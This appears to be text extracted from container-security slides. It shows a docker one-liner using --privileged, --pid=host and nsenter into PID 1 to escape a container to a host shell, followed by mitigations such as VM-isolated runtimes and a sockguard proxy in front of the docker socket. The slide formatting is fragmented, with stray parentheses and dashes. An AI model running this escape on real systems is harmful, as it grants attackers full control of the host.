If able to start containers, just leave the isolation:
docker run -it \
--privileged \
--pid=host \
alpine \
nsenter -t 1 -m -u -n -i sh
nsenter
nsenter
)--pid=host
)-t 1
)-m -u -n -i
)–
Isolates containers in a lightweight VM
Configured as a container runtime (instead of runc
)
–
For example sockguard
/sockguard -upstream-socket /var/run/docker-raw.sock -filename /var/run/docker.sock